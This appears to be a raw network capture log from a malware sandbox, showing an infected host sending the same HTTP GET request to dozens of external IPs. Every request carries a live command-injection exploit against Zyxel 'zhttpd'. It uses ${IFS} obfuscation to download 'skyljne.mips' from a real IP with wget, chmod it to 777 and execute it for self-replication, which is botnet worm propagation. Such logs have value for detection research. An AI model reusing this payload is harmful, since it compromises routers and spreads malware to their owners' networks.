                                      Jan 14, 2024 15:50:49.363256931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5025192.168.2.1446394183.199.88.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363307953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5026192.168.2.1459032192.98.68.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363383055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5027192.168.2.1449498177.139.144.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363432884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5028192.168.2.1445346107.27.249.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363501072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5029192.168.2.144651696.54.105.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363557100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5030192.168.2.1454144126.98.17.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363601923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5031192.168.2.144900814.212.223.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363656044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5032192.168.2.144679017.4.104.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363692045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5033192.168.2.143343842.218.53.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363778114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5034192.168.2.145174294.215.76.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363823891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5035192.168.2.144693299.11.252.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363874912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5036192.168.2.1453748105.94.185.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363940001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5037192.168.2.1437382139.70.98.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.363993883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5038192.168.2.143338259.150.109.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364048004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5039192.168.2.14439908.232.210.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364115953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5040192.168.2.144761495.26.251.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364157915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5041192.168.2.1457328208.52.96.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364188910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5042192.168.2.1458146128.124.204.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364260912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5043192.168.2.1448856132.121.246.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364299059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5044192.168.2.1459736175.56.68.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364375114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5045192.168.2.1435690208.90.206.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364417076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5046192.168.2.1449200206.211.228.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364491940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5047192.168.2.1452610122.75.250.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364523888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5048192.168.2.14386201.178.121.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364583969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5049192.168.2.1453140124.193.199.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364629030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5050192.168.2.1443914119.199.57.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364701033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5051192.168.2.1453172115.81.32.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364742994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5052192.168.2.1458564184.163.191.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364798069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5053192.168.2.1457272153.121.111.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364829063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5054192.168.2.1447770131.131.95.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364907980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5055192.168.2.145863881.132.24.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.364964962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5056192.168.2.1454954184.89.30.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365020037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5057192.168.2.1442388170.67.68.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365075111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5058192.168.2.1454670118.219.69.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365145922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5059192.168.2.1455942199.25.182.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365175009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5060192.168.2.143590254.237.220.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365246058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5061192.168.2.1459190165.221.224.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365304947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5062192.168.2.144887041.191.114.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365371943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5063192.168.2.1458566211.15.123.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365401983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5064192.168.2.1438332123.244.200.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365453005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5065192.168.2.1454488219.159.42.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365515947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5066192.168.2.1436560162.87.89.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365569115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5067192.168.2.1454228120.244.157.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365648985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5068192.168.2.14351382.112.13.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365689993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5069192.168.2.1440136109.113.153.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365765095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5070192.168.2.145511079.156.86.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365817070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5071192.168.2.1455428173.173.108.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365850925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5072192.168.2.1439764180.192.19.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365957975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5073192.168.2.145327218.235.58.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.365995884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5074192.168.2.1453006217.230.75.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366071939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5075192.168.2.144713842.233.245.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366142035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5076192.168.2.1457762184.138.225.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366197109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5077192.168.2.144812462.131.86.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366240978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5078192.168.2.1449256149.200.175.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366292000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5079192.168.2.145407096.96.211.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366336107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5080192.168.2.1434812177.210.100.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366400957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5081192.168.2.144307890.248.62.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366457939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5082192.168.2.145934619.158.90.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366486073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5083192.168.2.1455602220.9.68.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366559029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5084192.168.2.1435144151.180.5.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366596937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5085192.168.2.143866036.177.168.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366669893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5086192.168.2.145043465.77.95.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366729021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5087192.168.2.1451962116.23.117.230443
                                      TimestampBytes transferredDirectionData
